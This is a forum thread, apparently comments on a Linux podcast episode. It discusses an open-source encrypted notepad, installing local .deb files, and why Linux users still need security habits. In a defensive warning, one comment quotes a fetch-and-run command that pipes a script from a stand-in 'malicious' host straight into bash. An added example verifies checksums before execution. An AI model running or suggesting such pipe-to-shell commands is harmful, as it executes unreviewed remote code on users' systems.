374: Kaspersky for Linux but Do We Really Need Antivirus? Truth Revealed!

In regards to EncryptedNotepad2, I think you guys kind of missed the point behind having to compile it from source. The developer states that the goal is an experiment in open source with a business model, and that he will offer binaries and support for a one-time purchase.

See GitHub - ivoras/EncryptedNotepad2: A Notepad-like simple text editor where files are saved (and later loaded) encrypted with AES-256.

@grantorinowhiskey thanks for the comment, I did miss that part of their README . . . it really shouldn't be that far down the page. lol

I think it is totally fine to want to make money from open source software, the presentation needs a lot of improvement though. As a marketer, I would recommend they make a website for this app, put a big buy now button somewhere at the top portion of the website and also mention that source code is available. This is doing the reverse with having it on GitHub. Being on GitHub the first expectation is source code and since so many people are expecting to compile when seeing from GitHub that is somewhat pre-suggestive.

I agree with that, a marketed website would be more appropriate for making money. The GitHub page could be for those who want to contribute or build it from source.

1 Like

For the tip of the week, you guys were talking about using gdebi to install locally downloaded debs. FYI, apt already has the ability to install local debs:

apt install /path/to/the/deb

1 Like

You’re right, but in my opinion, something as simple as installing an application shouldn’t require a terminal.

While it’s true that it’s generally harder to catch a virus 🦠 on Linux by negligently clicking on downloaded files, there are still ways for attackers to target a user’s negligence. A common example is:

curl example.com/mymaliciousfile.sh | bash

Piping downloaded shell files into bash is the Linux developer equivalent of clicking on a downloaded .exe on Windows. Don’t do this. Download the file onto your disk first, have a look into it, compare checksums, and execute it when it looks fine.

Another common attack surface is unregulated package repositories, such as npm or pip. Here, a typo or a wrong name could result in installing a virus. I myself have installed the wrong packages several times because I remembered the package name wrongly or because it wasn’t available in PyPI (luckily, those wrong packages weren’t malicious).

Sure, on Linux, you still have the user/admin separation by default, which introduces basic security, but this won’t stop all malicious code. Ransomware doesn’t need admin privileges to encrypt your precious files.

2 Likes
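
The download-first, compare-checksums, then-execute routine from the post above, as an added shell example that is not part of the original thread. The function names, the `example.com` URL in the comment and the stand-in installer are assumptions for illustration; the sample script is constructed in a temp directory so the block runs offline.

```sh
#!/bin/sh
# Added example: verify an installer that is already on disk, then run that
# same on-disk copy. The expected digest must come from a channel other than
# the download itself (release notes, a signed announcement).

# sha256_of FILE: print the lowercase hex SHA-256 of FILE
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_script FILE EXPECTED: return 0 only when FILE exists and matches
verify_script() {
    [ -f "$1" ] || { echo "no such file: $1" >&2; return 1; }
    # Normalise case, then insist on exactly 64 hex digits so an empty or
    # truncated "checksum" can never be accepted.
    want=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    case "$want" in
        ""|*[!0-9a-f]*) echo "malformed checksum" >&2; return 1 ;;
    esac
    [ "${#want}" -eq 64 ] || { echo "malformed checksum" >&2; return 1; }
    have=$(sha256_of "$1")
    if [ "$have" != "$want" ]; then
        echo "checksum mismatch for $1: got $have" >&2
        return 1
    fi
}

# run_verified FILE EXPECTED [INTERPRETER]: execute only after verification
run_verified() {
    verify_script "$1" "$2" || return 1
    "${3:-sh}" "$1"
}

# Demo on a constructed stand-in for a downloaded installer. In practice:
#   curl -fsSLo install.sh https://example.com/install.sh   (hypothetical URL)
# then read install.sh before going any further.
demo_dir=$(mktemp -d)
printf 'echo "hello from installer"\n' > "$demo_dir/install.sh"
published=$(sha256_of "$demo_dir/install.sh")  # stands in for the vendor's digest
run_verified "$demo_dir/install.sh" "$published"
echo '# modified after publication' >> "$demo_dir/install.sh"
run_verified "$demo_dir/install.sh" "$published" || echo "refused to run"
rm -rf "$demo_dir"
```

A matching checksum only shows the file is the one the publisher hashed; it says nothing about whether the script is safe, so reading it first still matters.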

@vogelsaurier all of those are great points! Thanks for commenting with that feedback!

1 Like